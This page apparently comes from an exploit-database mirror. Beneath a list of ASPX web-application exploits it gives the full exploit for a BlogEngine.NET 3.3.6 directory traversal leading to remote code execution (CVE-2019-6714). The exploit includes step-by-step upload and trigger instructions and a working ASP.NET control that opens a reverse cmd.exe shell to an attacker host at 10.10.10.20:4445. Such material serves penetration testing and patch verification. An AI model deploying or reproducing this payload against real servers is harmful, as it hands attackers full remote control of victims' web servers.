Menu

Improved exploit search engine. Try it out

"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution"

Author

"Dustin Cobb"

Platform

aspx

Release date

2019-02-12

Release Date Title Type Platform Author
2019-02-12 "BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution" webapps aspx "Dustin Cobb"
2019-01-14 "Umbraco CMS 7.12.4 - Authenticated Remote Code Execution" webapps aspx "Gregory Draperi"
2017-05-05 "Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure" webapps aspx "Usman Saeed"
2018-10-29 "Library Management System 1.0 - 'frmListBooks' SQL Injection" webapps aspx "Ihsan Sencan"
2018-10-24 "Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting" webapps aspx "Dino Barlattani"
2018-10-10 "Ektron CMS 9.20 SP2 - Improper Access Restrictions" webapps aspx alt3kx
2018-08-06 "Sitecore.Net 8.1 - Directory Traversal" webapps aspx Chris
2018-06-04 "EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting" webapps aspx "Chris Barretto"
2018-03-13 "SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities" webapps aspx "SEC Consult"
2017-09-27 "SmarterStats 11.3.6347 - Cross-Site Scripting" webapps aspx sqlhacker
2017-09-13 "ICEstate 1.1 - 'id' SQL Injection" webapps aspx "Ihsan Sencan"
2017-06-14 "KBVault MySQL 0.16a - Arbitrary File Upload" webapps aspx "Fatih Emiral"
2017-05-09 "Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions" webapps aspx "Pesach Zirkind"
2017-05-09 "Personify360 7.5.2/7.6.1 - Improper Access Restrictions" webapps aspx "Pesach Zirkind"
2018-02-02 "IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting" webapps aspx 1n3
2017-12-27 "DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)" webapps aspx "Glafkos Charalambous"
2017-03-15 "Sitecore CMS 8.1 Update-3 - Cross-Site Scripting" webapps aspx "Pralhad Chaskar"
2017-01-17 "Check Box 2016 Q2 Survey - Multiple Vulnerabilities" webapps aspx "Fady Mohammed Osman"
2018-01-24 "Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Arbitrary File Upload" webapps aspx "Paul Taylor"
2018-01-24 "Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Encryption Keys Disclosure" webapps aspx "Paul Taylor"
2016-09-22 "Microix Timesheet Module - SQL Injection" webapps aspx "Anthony Cole"
2016-09-19 "MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities" webapps aspx "Paul Baade & Sven Krewitt"
2017-11-16 "LanSweeper 6.0.100.75 - Cross-Site Scripting" webapps aspx "Miguel Mendez Z"
Release Date Title Type Platform Author
2019-02-12 "BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution" webapps aspx "Dustin Cobb"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46353/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46353/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46353/40830/blogenginenet-336-directory-traversal-remote-code-execution/download/", "exploit_id": "46353", "exploit_description": "\"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution\"", "exploit_date": "2019-02-12", "exploit_author": "\"Dustin Cobb\"", "exploit_type": "webapps", "exploit_platform": "aspx", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE
# Date: 02-11-2019
# Exploit Author: Dustin Cobb
# Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/
# Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip
# Version: <= 3.3.6
# Tested on: Windows 2016 Standard / IIS 10.0
# CVE : CVE-2019-6714

/*
 * CVE-2019-6714
 *
 * Path traversal vulnerability leading to remote code execution.  This 
 * vulnerability affects BlogEngine.NET versions 3.3.6 and below.  This 
 * is caused by an unchecked "theme" parameter that is used to override
 * the default theme for rendering blog pages.  The vulnerable code can 
 * be seen in this file:
 * 
 * /Custom/Controls/PostList.ascx.cs
 *
 * Attack:
 *
 * First, we set the TcpClient address and port within the method below to 
 * our attack host, who has a reverse tcp listener waiting for a connection.
 * Next, we upload this file through the file manager.  In the current (3.3.6)
 * version of BlogEngine, this is done by editing a post and clicking on the 
 * icon that looks like an open file in the toolbar.  Note that this file must
 * be uploaded as PostView.ascx. Once uploaded, the file will be in the
 * /App_Data/files directory off of the document root. The admin page that
 * allows upload is:
 *
 * http://10.10.10.10/admin/app/editor/editpost.cshtml
 *
 *
 * Finally, the vulnerability is triggered by accessing the base URL for the 
 * blog with a theme override specified like so:
 *
 * http://10.10.10.10/?theme=../../App_Data/files
 *
 */

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
	static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

	using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
		using(System.IO.Stream stream = client.GetStream()) {
			using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
				streamWriter = new System.IO.StreamWriter(stream);
						
				StringBuilder strInput = new StringBuilder();

				System.Diagnostics.Process p = new System.Diagnostics.Process();
				p.StartInfo.FileName = "cmd.exe";
				p.StartInfo.CreateNoWindow = true;
				p.StartInfo.UseShellExecute = false;
				p.StartInfo.RedirectStandardOutput = true;
				p.StartInfo.RedirectStandardInput = true;
				p.StartInfo.RedirectStandardError = true;
				p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
				p.Start();
				p.BeginOutputReadLine();

				while(true) {
					strInput.Append(rdr.ReadLine());
					p.StandardInput.WriteLine(strInput);
					strInput.Remove(0, strInput.Length);
				}
			}
		}
    	}
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
   	StringBuilder strOutput = new StringBuilder();

       	if (!String.IsNullOrEmpty(outLine.Data)) {
       		try {
                	strOutput.Append(outLine.Data);
                    	streamWriter.WriteLine(strOutput);
                    	streamWriter.Flush();
                } catch (Exception err) { }
        }
    }

</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>